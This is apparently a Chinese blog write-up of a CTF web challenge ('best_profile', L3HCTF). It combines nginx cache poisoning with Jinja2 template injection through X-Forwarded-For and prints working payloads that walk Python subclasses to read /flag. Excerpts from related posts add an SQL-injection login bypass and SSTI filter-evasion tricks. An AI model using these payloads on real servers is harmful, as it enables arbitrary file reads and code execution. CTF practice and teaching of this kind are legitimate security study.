L3HCTF

发表于2025-07-20|更新于2025-08-30

|总字数:363|阅读时长:1分钟|浏览量:

L3HCTF

web

best_profile

审计给出的源代码判断漏洞点大概率存在于ip_detail路由下的模版注入，查看给出的nginx配置文件中对于.js文件会缓存12h，可以通过注册x.js类型的用户名利用cache poisoning进行投毒，使ip_detail路由下访问127.0.0.1/get_last_ip后访问到的为我们投毒后具有恶意ip的页面并在后续进行渲染和回显
对缓存投毒的学习总结
步骤如下
1.注册a.js用户，抓包改xff为我们进行模版注入的payload后访问get_last_ip路由进行缓存投毒
{{7*7}}

2.访问ip_detail路由成功回显
49

3.寻找可用类（此处由于尚未发现特殊符号如’在编码传入模版时会携带&导致报错故未能直接获取flag）
X-Forwarded-For:{% for cls in [].__class__.__base__.__subclasses__() %}{% if cls.__init__.__globals__ %}{{ loop.index0 }} {% endif %}{% endfor %}
X-Forwarded-For:{{ [].__class__.__base__.__subclasses__()[216].__name__ }} //遍历后找到catch_warnings

4.读取flag
X-Forwarded-For: {{ [].__class__.__base__.__subclasses__()[216].__init__.__globals__['__builtins__'].open('/flag').read() }} //报错500

5.本地起环境开debug模式找原因，发现是存在&符号导致，即在last_ip.html网页中’等特殊符号会被编码出&，故利用request进行绕过
X-Forwarded-For: {{ [].__class__.__base__.__subclasses__()[216].__init__.__globals__[request.values.a].open(request.values.b).read() }}
?a=__builtins__&b=/flag
获得flag

文章作者: xianxin

文章链接: https://xianxinyyds.github.io/2025/07/20/L3HCTF/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源仙心！

相关推荐

HGAME 2025webLevel 24 Pacman进去是个吃豆人游戏，game，game！！！！！！！！！！！！！！！！！！！！！！！，达到1w分给flag，这种一般是前端网页游戏，可以去f12的网络栏验证，如果你没有寄了还没有网络请求就是纯前端，这里就是然后先寄一次，爆了个一眼base64的假flag，这里直接去前端的2个js文件里面查找这个字符串，然后成功找到，分析其所在的函数，虽然被混淆，但是还是能看懂是结算判定，同时还有1w的16进制在语句中，所以真flag一定在这里再仔细看发现了_SOCRE这个参数，直接去控制台修改，然后再寄掉就是真flag了 _SOCRE=10000 然后就是解码flag了，首先肯定是base64解码，得到一个有点像flag的字符串，观察发现hgame前缀是有的，不过被拆开了，跳着读发现规律，其实就是栅栏密码，即将字符串分成2栏，然后竖着读，解码得到flagLevel 47 BandBomb页面是个文件上传功能，查看源代码后发现除了上传就是修改名字，一开始先试了试一句话木马，然后发现读取不了uploads路径，但是背景图在的静态资源...

2025H&NCTF半成品login登录界面弱密码爆破admin admin123登录后得到提示这个半成品的login界面还是太没意思了我把你想要的东西放 hacker***** 用户下了你登上去自己拿吧而且似乎数据都是小写啊,太弱了! 注意：系统已修复SQL注入漏洞，请勿尝试非法访问判断应该通过sql注入方式登录hacker*****用户获取flag尝试后在password处发现存在可用注入点，猜测后台查询语句如下SELECT * WHERE username = '' AND password = '' 利用%进行用户名模糊匹配，通过||(or)与and的优先级顺序直接登录hacker*****用户，payload如下username=hacker&password=fake%2527/**/||/**/username/**/like/**/%2527hacker%%2527# payload效果等效于SELECT * WHERE username = 'hacker' AND password=...

HASHCTF WPwebbbbb这鸡汤不十分滴美味访问后是一个mc主题的交易界面，审计给出的app.js和route.js可以得到大体获得flag的思路flag在最后一个价值为88绿宝石的商品的回显上首先获取足够的绿宝石来兑换商品，这里只提供了劫掠码这一种方法，同时还设置了一天只能兑换一次的限制123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051router.get('/raid', isAuth, async (req, res) => { try { const user = await User.findById(req.user.userId); if (!user) { return res.render('error', { Authenticated: true, message: '...

GHCTFwebupload?SSTI!主要就是过滤了['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]，可以利用{%set xhx=(lipsum|string|list)|attr('pop')(3*8)%}获取下划线，拼接获取'os'，'__builtins__', '__globals__'，chr函数获取flag。 123456789101112131415161718192021{%set one=dict(c=a)|join|count%}{%set two=dict(cc=a)|join|count%}{%set three=dict(ccc=a)|join|count%}{%set four=dict(cccc=a)|join|count%}&#...

Lilctf 2025webez_bottle给出了源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116from bottle import route, run, template, post, request, static_file, errorimport osimport zipfileimport hashlibimport time# hint: flag in /flag , have a tryUPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads'...

justctfwebPositive Players123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193...